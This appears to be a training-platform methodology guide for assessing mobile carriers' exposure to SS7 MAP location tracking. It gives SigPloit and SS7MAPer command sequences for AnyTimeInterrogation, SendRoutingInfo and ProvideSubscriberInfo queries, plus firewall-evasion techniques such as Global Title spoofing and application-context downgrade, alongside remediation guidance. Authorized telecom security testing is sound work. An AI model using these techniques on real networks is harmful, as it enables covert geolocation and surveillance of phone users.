SS7 / MAP / SIGTRANAdvanced⏱️ 3-4 hours

SS7 Location Tracking Assessment

Methodology for assessing carrier vulnerability to SS7 MAP-based subscriber location tracking via AnyTimeInterrogation, ProvideSubscriberInfo, and SendRoutingInfo.

SS7 Location Tracking Assessment — MAP Protocol Methodology

This guide documents the methodology for testing carrier SS7 networks against unauthorized subscriber location tracking. It covers MAP (Mobile Application Part) operations including AnyTimeInterrogation (ATI), ProvideSubscriberInfo (PSI), and SendRoutingInfo (SRI) that enable real-time geolocation of mobile subscribers.

Prerequisites

  • TelcoChisel OS with SigPloit and SS7MAPer installed
  • SCTP connectivity to the target SS7 network (via legitimate test interconnect or lab setup)
  • Valid SS7 Global Title (GT) for source addressing
  • Understanding of ITU-T Q.700 series and 3GPP TS 29.002 (MAP specification)

Phase 1: SS7 Network Reconnaissance

1.1 SCTP Endpoint Discovery

# Discover SIGTRAN M3UA signaling endpoints on the target network
sudo sctpscan -d 10.0.0.0/24 -p 2905 -r

# Identify STP (Signaling Transfer Point) addresses
sudo sctpscan -d 172.16.0.0/16 -p 2905,14001 -r

1.2 SS7 Topology Mapping

# Use SS7MAPer for automated topology discovery
python3 ss7maper.py --target-gt 441234567890 --source-gt 441111111111 --mode discovery

# Map accessible HLR, VLR, MSC, and SMSC nodes
python3 ss7maper.py --target-gt 441234567890 --mode map-nodes

Phase 2: Location Tracking Tests

2.1 AnyTimeInterrogation (ATI)

ATI queries the HLR/HSS directly for the subscriber's current Cell-ID, LAC, and serving MSC address:

# Send ATI request via SigPloit
cd /opt/sigploit && python3 sigploit.py

# Select: SS7 > Location Tracking > AnyTimeInterrogation
# Target MSISDN: +44xxxxxxxxxx
# Source GT: <your-test-GT>

Expected Response (if unfiltered):

  • Current Cell Global Identity (CGI): MCC-MNC-LAC-CellID
  • Age of Location Information (seconds since last location update)
  • Serving MSC/VLR address

2.2 SendRoutingInfo (SRI)

SRI is a legitimate MAP operation (used for call routing) that reveals the serving MSC address and IMSI:

# Send SRI request
python3 sigploit.py
# Select: SS7 > Location Tracking > SendRoutingInfo
# Target MSISDN: +44xxxxxxxxxx

# This reveals:
# - IMSI (subscriber permanent identity)
# - Serving MSC Global Title
# - Roaming Number (MSRN)

2.3 ProvideSubscriberInfo (PSI)

PSI is sent to the VLR/MSC to retrieve current subscriber state:

# PSI request via SigPloit MAP module
# This returns:
# - Subscriber State (idle/busy/not-reachable)
# - Current Cell-ID (if Type A location info)
# - IMEISV (handset identification)

Phase 3: Firewall Testing & Evasion

3.1 Test SS7 Firewall Rules

# Test with different SCCP Calling Party addresses
python3 ss7maper.py --target-gt 441234567890 --source-gt 331111111111 --mode ati

# Test GT translation bypass
python3 ss7maper.py --target-gt 441234567890 --source-gt 441234567890 --mode ati --spoof-hlr

# Test with different MAP Application Contexts
python3 ss7maper.py --target-gt 441234567890 --mode ati --map-ac v3
python3 ss7maper.py --target-gt 441234567890 --mode ati --map-ac v1

3.2 Common Bypass Techniques

TechniqueDescriptionDetection
GT SpoofingUse a GT belonging to a legitimate roaming partnerGT allowlist validation
AC DowngradeUse older MAP Application Context versionsAC version enforcement
OpCode EncodingAlternate BER encoding of MAP operationsDeep packet inspection
Split MessagesFragment across SCCP segmentsReassembly-based inspection

Phase 4: Reporting

4.1 Finding Template

FieldValue
TitleUnauthorized Subscriber Location Tracking via SS7 ATI
SeverityCritical
CVSS9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H)
ImpactReal-time geolocation of any subscriber on the network
RemediationDeploy SS7 firewall with ATI/PSI blocking for untrusted GTs, implement GSMA FS.11 category filtering

4.2 Reference Standards

  • GSMA FS.11: SS7 Interconnect Security Monitoring and Firewall Guidelines
  • GSMA IR.82: SS7 Security Network Implementation Guidelines
  • 3GPP TS 29.002: MAP Protocol Specification
  • ITU-T Q.713: SCCP Formats and Codes

Practice in TelcoSec Academy

👉 Launch the SS7 Red Team Lab on App.TelcoSec.Net